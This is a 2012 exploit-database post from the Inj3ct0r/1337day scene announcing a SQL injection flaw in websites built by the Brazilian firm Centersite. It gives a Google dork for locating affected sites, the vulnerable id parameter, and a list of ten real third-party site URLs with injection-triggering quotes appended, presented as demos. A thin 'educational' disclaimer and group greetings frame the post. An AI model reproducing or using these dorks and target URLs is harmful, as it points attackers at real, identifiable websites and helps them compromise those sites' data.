Sites designed by Centersite suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
2cb74f7fd2a3daf7b9da13be77c4c064c52c23e62dc6363e8950bccd66204ccf
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title: Centersite SQL Injection Vulnerability
[+] Date: 12-09-2012
[+] Category: WebApp
[+] Google Dork: intext:"hosting & design Centersite" inurl:".php?id="
[+] Tested on: Windows 7 Professionnel / Windows Server 2008
[+] Vendor: http://www.centersite.com.br/
########################################################################################
#################################################################################
||| ~~ Use It At Your Own Risk ~~ |||
||| It's For Educational Purpos Only |||
||| I'm Responsible For Any Damage |||
#################################################################################
Example:
127.0.0.1/infoNovidades.php?id=[SQLi]
Demos:
http://www.zema.com.br/?pagina=acessorios.php&id=4'
http://www.wagnerlennartz.com/infoNovidades.php?id=12'
http://www.indeco.com.br/?pagina=info_jpf_racing.php&id=17'
http://www.promoinflaveis.com.br/eventos.php?id=21'
http://www.embramadem.com.br/?pagina=info_destaque.php&id=26'
http://www.wagnerlennartz.com/infoNovidades.php?id=9'
http://www.promoinflaveis.com.br/clientes2.php?id=8'
http://www.ibnabrazil.com/?pagina=info_pequenos.php&id=2'
http://www.inamalimentos.com.br/DestaqueDetalhe.php?id=4'
http://www.orbebrasil.com.br/?pagina=produtos_sub.php&id=7'
More in Google =)
áÇ Çáå ÇáÇ Çááå ãÍãÏÇ ÚÈÏå æÑÓæáå
########################################################################################
Greets to: TN H4CK3RZ , r00tw0rm members and Inj3ct0r Team
###########################################################################################